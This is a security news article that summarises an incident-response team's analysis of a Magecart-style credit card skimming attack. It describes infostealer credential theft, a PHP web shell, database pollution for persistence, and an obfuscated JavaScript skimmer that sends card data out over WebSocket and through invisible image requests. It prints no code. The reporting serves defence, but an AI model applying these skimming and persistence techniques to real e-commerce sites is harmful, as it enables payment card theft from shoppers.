Ddos 
The Yarix Incident Response Team has uncovered a sophisticated web skimming operation that weaponized obfuscated JavaScript to silently siphon credit card data from unsuspecting shoppers on a compromised e-commerce platform. The findings shed light on how Magecart-style attacks continue to evolve, utilizing stealth, persistence, and clever evasion to bypass modern detection systems.
The investigation began with the analysis of a seemingly innocuous script found embedded in an e-commerce checkout page. According to Yarix: “The script turned out to be designed to steal credit card data to exfiltrate sensitive information during online transactions on an e-commerce site.”
Further inspection revealed that the code was not just malicious—it was meticulously obfuscated to conceal its true intent. This obfuscation included misleading function names, hexadecimal values, and dynamic self-defining functions like the aptly nicknamed “chameleon”.
“At the beginning of the analysis, the code contained within the script appears well obfuscated and almost unreadable… The ‘chameleon’ function is particularly interesting because it self-defines again after the first use.”
The attack began with a classic tactic: credential theft via infostealer malware, enabling unauthorized access to the e-commerce backend. Once inside, the attacker uploaded a malicious PHP web shell, granting full remote control over the server.
“This PHP file acts as a web shell and allows the attacker to execute commands and gain complete remote control… ensuring that the attacker can return to control the server.”
The next move was to tamper with the site’s database, inserting a fake image script—a covert payload that would later serve as a trigger for further malicious activity.
The main of the attack was a heavily disguised JavaScript module masquerading as an image handler. It dynamically injected additional scripts, performed form surveillance, and stole user input during checkout. It used two cunning exfiltration methods:
1. WebSocket-Based Data Theft
A function named createWebSocket established an encrypted channel to the attacker’s Command-and-Control (C&C) server.
“The function extracts data from the local memory of the browser, using the key ‘XsuHCYmfbgVSRFVx7SHRnU7DfapjFpaf’… and creates a WebSocket instance.”
Once active, the WebSocket transmitted stolen data such as card numbers and initiated real-time interactions to adapt the fake checkout form based on user activity.
2. Fake Image Exfiltration
The attackers also used a createImage function to discreetly transmit base64-encoded data to a remote server via an invisible image request.
“This stratagem makes it possible to circumvent normal HTTP request tracking by exploiting the nature of images to pass information through without the user being aware of it.”
This allowed email addresses, names, addresses, card details, and even user agents to be exfiltrated without triggering any alarms.
To ensure long-term presence, the attackers injected malicious payloads directly into the database:
“This technique (database pollution)… allowed malicious code to be executed whenever the website performed a read of the tampered row of its database.”
This clever move guaranteed that even if the external scripts were removed, the next page load could reinfect the site.
Organizations must regularly audit not only front-end content but also their backend infrastructure, database integrity, and browser localStorage access patterns. As Yarix concludes:
“The goal of this analysis is to understand the techniques used by the attacker thus enabling the development of effective mitigation strategies.”
Related Posts:
- Credit Card Skimmer Malware Uncovered: Targeting Magento Checkout Pages
- Silent Skimmer Reemerges: New Tactics Target Payment Gateways
- Researcher Exposes WebSockets’ Role in Credit Card Skimming
- Cyberattack on Magento: Hackers Inject Skimmer, Card Data Stolen
- Fake Font Domain Used in Credit Card Skimming Attack
Donate